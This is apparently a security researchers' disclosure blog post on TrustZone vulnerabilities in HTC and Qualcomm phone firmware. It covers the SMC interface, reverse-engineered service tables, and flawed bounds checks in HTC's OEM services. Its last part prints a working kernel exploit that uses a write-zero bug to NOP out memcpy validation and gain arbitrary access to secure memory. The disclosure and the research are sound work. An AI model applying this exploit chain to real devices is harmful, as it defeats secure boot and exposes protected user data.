Thursday, August 14

Here Be Dragons: Vulnerabilities in TrustZone

In June we presented on vulnerabilities in the Qualcomm & HTC implementations of TrustZone at REcon 2014. We have been patiently waiting to drop the research to those interested, and now that Vegas is behind us, we can finally do so.

Why the wait? Well, after REcon, we noted that Dan Rosenberg was presenting on TrustZone research at Black Hat USA, and out of respect for Dan's work, Atredis decided to sit on this blogpost until after his talk. Overlaps and similar research happen all the time, and since BlackHat was fairly close at the time we thought it best to let Dan have the mic. Dan's stuff is great - you should check out his slides and WP; he dropped a good bug with similar impact, and it covers some TZ components not discussed here.

[What is TrustZone?]

The ARM specification of TrustZone Technology has been heavily promoted as the "be all, end all" solution for mobile security. Through extensive marketing promises of easy BYOD, secure pin entry, and protection against APT (not to mention the ubiquity of ARM chips soldered into mobile devices) TrustZone has become the de-facto standard for claiming and providing a "secure processing environment" in cellular handsets.

While a secure processing environment sounds like an awesome thing to have as an end user, the realistic drivers for the massive TrustZone adoption are not owner empowerment but the more mundane use-case of Digital Rights Management (DRM). The secure enclave of TrustZone is primarily used to facilitate vendor locks and DRM processing, rather than increasing the difficulty in compromising user data. Further, due to TZ architecture, the inclusion of DRM protections provide a net reduction in real world security provided to the device owner.

Soap box and ramblings aside, Google is your friend if you want more specification data from ARM or if you want high level details from Qualcomm's fortress of shallow marketing materials (trademark pending)... but enough already, let's talk details.

You can watch our REcon presentation here, but unfortunately the first 10-15 minutes was cut off. We're using this blog post to document the vulnerabilities reported to HTC and shed some further light on TrustZone.

[Funny aside: after finding HTC's PGP key on their site and emailing them, they got back to us a month later saying they couldn't open it, and to please send in the clear. We obliged, and they've told us it's fixed, but we are unable to validate until a new firmware revision makes it through a carrier and into the real world.]


TZ consumes untrusted input from a number of places:
  • SMC [Secure Monitor Call] interface (has had the most public research)
  • Interrupts
  • Shared Memory
  • Peripherals
We primarily focused on the SMC interface for this round of TZ research. Additionally, we built a fuzzer for TZ that resulted in a metric ton of crashes, but because of architectural reasons, we still think the best route for TZ vuln discovery (on the SMC interface) is via static reversing.


The SMC interface is invoked by utilizing the SMC ARM instruction from supervisor mode, meaning you need to be in the kernel. You invoke the instruction with a pointer to a physical memory location that contain the below structures. Code snippits below are taken from arch/arm/mach-msm/scm.c from an Android kernel.
 42  * An SCM command is laid out in memory as follows:
 43  *
 44  *      ------------------- <--- struct scm_command
 45  *      | command header  |
 46  *      ------------------- 
 47  *      | command buffer  |
 48  *      ------------------- <--- struct scm_response
 49  *      | response header | 
 50  *      -------------------
 51  *      | response buffer |
 52  *      -------------------

The scm_command struct contains its total length, offset to its request buffer, offset to its response buffer header (which in turn contains another offset to its own buffer), and the buffers themselves:
 58 struct scm_command {
 59         u32     len;
 60         u32     buf_offset;
 61         u32     resp_hdr_offset;
 62         u32     id;
 63         u32     buf[0];
 64 };

The resp_hdr_offset entry points to:
 72 struct scm_response {
 73         u32     len;
 74         u32     buf_offset;
 75         u32     is_complete;
 76 };

Lastly, the example kernel driver code that utilizes these buffers:
164 static u32 smc(u32 cmd_addr)
165 {
166         int context_id;
167         register u32 r0 asm("r0") = 1;
168         register u32 r1 asm("r1") = (u32)&context_id;
169         register u32 r2 asm("r2") = cmd_addr;
170         do {
171                 asm volatile(
172                         __asmeq("%0", "r0")
173                         __asmeq("%1", "r0")
174                         __asmeq("%2", "r1")
175                         __asmeq("%3", "r2")
176 #ifdef REQUIRES_SEC
177                         ".arch_extension sec\n"
178 #endif
179                         "smc    #0      @ switch to secure world\n"
180                         : "=r" (r0)
181                         : "r" (r0), "r" (r1), "r" (r2)
182                         : "r3");
183         } while (r0 == SCM_INTERRUPTED);
185         return r0;
186 }

When smc is called, the command buffer will contain a struct made up the ID of the TZ service being called and an arbitrary number of variables needed for that function.

As one example, scm_set_boot_addr in scm-boot.c invokes SMC like so:
 22 int scm_set_boot_addr(phys_addr_t addr, unsigned int flags)
 23 {
 24         struct {
 25                 unsigned int flags;
 26                 unsigned long addr;
 27         } cmd;
 29         cmd.addr  = addr;
 30         cmd.flags = flags;
 31         return scm_call(SCM_SVC_BOOT, SCM_BOOT_ADDR,
 32                         &cmd, sizeof(cmd), NULL, 0);
 33 }

[Aside: SCM is not a typo. Qualcomm actually chose SCM, "Secure Channel Manager", as a wrapper for SMC. The scm_call function simply spins up the correct kernel buffers and converts virtual addresses to their phys counterparts.]

OK, so we know how SMC works, what can we actually talk to?

[TrustZone Services] 

Inside TZ, there is a table labeling all the services, command IDs, location of the function implementing a given service, return types, and the number and size of arguments. It looks like this:
ROM:2A02E054                 DCD 0x801               ; Service ID
ROM:2A02E058                 DCD aTzbsp_pil_init     ; "tzbsp_pil_init_image_ns"
ROM:2A02E05C                 DCD 0x1D                ; Return type
ROM:2A02E060                 DCD tzbsp_pil_init_image_ns+1
ROM:2A02E064                 DCD 2                   ; Number of arguments
ROM:2A02E068                 DCD 4                   ; Size of arg1
ROM:2A02E06C                 DCD 4                   ; Size of arg2
ROM:2A02E070                 DCD 0x805
ROM:2A02E074                 DCD aTzbsp_pil_auth     ; "tzbsp_pil_auth_reset_ns"
ROM:2A02E078                 DCD 0x1D
ROM:2A02E07C                 DCD tzbsp_pil_auth_reset_ns+1
ROM:2A02E080                 DCD 1
ROM:2A02E084                 DCD 4

... And so on.

From here, we can enumerate all available services, know what to expect them to return, as well as know how many arguments to send and what size they are.

[Pointer: this table is really useful for figuring out the base of the firmware image when you extract it from a device or a firmware file. The string pointer for service 0x801 should always point to "tzbsp_pil_init_image_ns", giving you the offset values you need to calculate its base.]

Looking at the full listing, most are part of the Qualcomm core functionality available on all supported devices, but OEMs have the option of extending it with their own services. HTC extended theirs considerably, so let's focus on them:

Look at those primitives! _write_mem, _read_mem, _memcpy?!

Ah, so here's where we learn a new valuable lesson about TZ service security: Everyone does their own thing. To summarize it:
  • Each function individually validates input on invocation.
  • HTC utilizes an access bitmask representing each of their tzbsp_oem functions, with a check at the top of every function determining if the service is disabled or not. (See [is_service_enabled] below. This is how HTC disables those fantastical exploit primitives listed above.)
  • Qualcomm does not universally block access to any of their functions. If they're present, it's assumed they're needed, and while input is validated, the function itself is accessible to the kernel.
  • Qualcomm's input validation uses a check against several protected memory regions, bailing out if you touch any of them.
  • Some OEMs perform their own validation of input against their specific address ranges, rather than using QC's list. Their addresses are, umm, less complete.
  • Some platforms copy QC's model, performing the same validation. 
One thing I'll point out about this model is that each function has to do it correctly, themselves. Guess how consistent it is across all of the given players?

[Randomness: You may notice the tzbsp_oem_do_something function. We've seen that function in numerous vendor implementations, and we can only suspect it is sample code that QC provides to OEMs who just leave it in their production code. If you are curious what that function does, however, you will usually find it merely returns 0. Yes, the aptly named tzbsp_oem_do_something inevitably does nothing.]

[Enter HTC]

One short piece of information before we dive into the bugs.


This is the bitmask I was referencing above that HTC added to their OEM functions. The bitmask starts off as 0xFFFFFFFF in flash, and during boot, dangerous functions are turned off once they are not needed. This is perhaps a fragile model, but it does allow the temporary usage of TZ services that can later be disabled after they are no longer needed.
signed int __fastcall is_svc_enabled(unsigned __int8 svc_id)
  return g_disable_bitmask & (1 << svc_id);

[Note: TZ does quite a bit of validation, to varying degrees of success, on addresses passed in to ensure writes to secure memory don't occur. Because of this, if you pass in the address of a kernel variable to detect a write vulnerability, it won't tell you anything, because it is not a secure address. So how can you detect write vulnerabilities without reversing them? Well, you can pass in the address of g_disable_bitmask and then try to invoke all OEM functions as a poor man's read primitive. If your write succeeded, you will see that different functions are now enabled/disabled.]

[tzbsp_oem_access_item, address validation]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)

int tzbsp_oem_access_item(int write_flag, int item_id, void * addr, int len) {
  if (!is_svc_enabled(26)) {
    return -4;

  if (IS_TZ_MEMORY(addr) || IS_TZ_MEMORY(addr + len - 1) ) && addr < 0x2A03F000) {
    return -1;

  if (!write_flag) {
    if (item_id == 37) {
      if (g_flag > 0) {
        memcpy(addr, g_item_37, len);

HTC uses similar bounds checking in a few places. This check tries to verify if the start and stop addresses are in between 0x2A000000 and 0x2A03F000. There are multiple problems with this:
  • It's only checking against one range, where QC's code checks against 12.
  • What happens if the length value is really big? (Answer: it overflows and wraps around under 0x2A03F000, bypassing this check, but it's ugly and influences a lot more than is ideal.)
  • This address range is supposed to be the TZ code and data itself, but someone forgot to update the ceiling, because the TZ code extends past 0x2A03F000 due to large amounts of DRM code.
In any event, that one is a pain to exploit, and there are others, so let's move on.

[tzbsp_oem_discretix, memory write]

int __tzbsp_oem_discretix(struct_p * s, size_t len) {
  if (len != 0x14) {
    return -16;
  s->status = g_fs_status; // *(int *)(s + 16) = g_fs_status

Hey, not everyone validates their input! And check that out, an overwrite of s->status (s + 16) with whatever is stored at 0x2A02BC80 (g_fs_status).

We later determined this value was zero in every case we cared about, so we can call it a write zero primitive. Under the hood, it is using the ARM STR instruction, so it has to be 4-byte aligned, but is otherwise very flexible.

[tzbsp_oem_memcpy, why do you exist?]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)
#define CONTAINS_TZ_MEMORY(x, len) (x < 0x2A000000 && (x + len) >= 0x2B000000)

signed int tzbsp_oem_memcpy(void * dst, void * src, uint32_t len)
  uintptr_t dst_end   = dst + len - 1;
  uint32_t copying_to_tz   = CONTAINS_TZ_MEMORY(dst, len) || IS_TZ_MEMORY(dst);
  uint32_t copying_from_tz = CONTAINS_TZ_MEMORY(src, len) || IS_TZ_MEMORY(src);

  if ( !is_service_enabled(20) )
    return -4;
  if (copying_to_tz && copying_from_tz) {
    return -1;
  if (copying_to_tz && dst < 0x2A03F000) {
    return -1;

  if ( dword_2A02BAC8 > 1u ) {
    if (dst < 0x88AF0000 && dst_end >= 0x88AF1140) {
      return -16;
    if ((dst_end + 0x77510000) < 0x1140 || (dst + 0x77510000) < 0x1140) {
      return -16;
    if (src != 0x88AF0000) {
      return -2;
    if (len != 0x1140) {
      return -17;
  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;

In this pseudocode, we can see some address validation (heh, no comment), checking a flag to perform further validation, etc. At the very end, we have:

  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;

So if we can get there, we have a fully controlled memcpy(). But how can we do that?

00 00                        MOV r0, r0         ; nop in thumb mode
00 00 00 00                  ANDEQ r0, r0, r0   ; nop in arm

A null write is a NOP equivalent in both ARM and thumb mode, if you overwrite code. And surely that isn't RWX, is it? Well, apparently so.

ROM:2A003278                 PUSH            {R3-R7,LR}
ROM:2A00327A                 MOV             R4, R0
ROM:2A00327C                 MOV             R3, R1
ROM:2A00327E                 MOV             R5, R2

// validation, nop'd out

ROM:2A0033EC                 MOV             R1, R3
ROM:2A0033EE                 MOV             R0, R4
ROM:2A0033F0                 BLX             memcpy
ROM:2A0033F4                 MOV             R1, R5
ROM:2A0033F6                 MOV             R0, R4
ROM:2A0033F8                 BLX             invalidate_data_cache
ROM:2A0033FC                 MOVS            R0, #0
ROM:2A0033FE                 POP             {R3-R7,PC}
ROM:2A0033FE ; End of function tzbsp_oem_memcpy

Using the write zero primitive on the address range from 0x2A003280 to 0x2A0033E8 nops out all validation, allowing you to memcpy in and out of secure memory as desired.

This memcpy can be used to export all data out of secure memory, copy in your own shellcode, overwrite QC's knowledge of where secure and insecure code resides, and anything else you need. Boom!

The exploit code is shown below, utilizing this memcpy to overwrite the g_disable_bits bitmask with 0xFFFFFFFF to turn on all services. For simplicity, the call_svc function is not included, but it is merely a wrapper around a smc call that sets up the scm_command structure. It takes in the SCM function identifier, the argument count, and then that number of arguments.

  #define TZ_MEMCPY_NOP_START (0x2A003280)
  #define TZ_MEMCPY_NOP_STOP  (0x2A0033E8)
  #define TZ_HTC_DISABLE_BITS (0x2A02BAC4)

  #define TZ_HTC_OEM_MEMCPY_ID (0x3f814)
  #define WRITE_ZERO(x) call_svc(0x3f81b, 3, 0x0, x - 0x10, 0x14);

  // allocate our version of the g_disable_bits and set to 0xffffffff (all enabled)
  int * val = kzalloc(4, GFP_KERNEL);
  val[0] = 0xffffffff;

  // NOP out all validation in tzbsp_oem_memcpy
  for (i = TZ_MEMCPY_NOP_START ; i <= TZ_MEMCPY_NOP_STOP ; i+=4) {
    if ((i % 4) != 0) {
      printk("[-] [0x%x] INVALID NOP...MUST BE 4 BYTE ALIGNED!\n", i);

  // use memcpy to enable all the other functions (unnecessary but fun)
  call_svc(TZ_HTC_OEM_MEMCPY_ID, 3, TZ_HTC_DISABLE_BITS, virt_to_phys(val), 4);


[So What?]

We've shown a pathway for gaining arbitrary code execution within TrustZone, but, in fairness to Qualcomm, this specific exploit is limited to HTC devices and caused by code HTC added. However, it's a great exemplar of how just one, terrible, and obvious write zero vulnerability can lead to the complete compromise of TrustZone. And due to TrustZone's architecture, passing physical buffers back and forth, this class of write vulnerability is the most common and simplest vulnerability you're going to find. So to summarize, write vulns pop up like mushrooms from this fertile ground, and write vulns can really ruin your day.

To put it another way, why does a mistake in discretix (dealing with DRM functionality) have the ability to nuke secure boot? This seems like a dangerous idea, and is what we meant when we started this all off with the claim that the inclusion of bad, complex code provides a net reduction in real world security for the user. And we're ragging on DRM code here because that's where the vulnerability we discussed was found, but TZ does not allow for the inclusion of imperfect code, anywhere. And imperfect code abounds.

Given the financial drivers, we don't expect a lot of this to change, but we're hopeful we'll one day see a trend towards protecting the user from malware over protecting media companies from users.

In conclusion, we have given a peek behind the trusted veil to show you a piece of how everything works, as well as a few pointers along the way to get you started on your own research.

Hope you enjoyed our travels. Talk to you again soon. 

Go forth and 0day,
n & c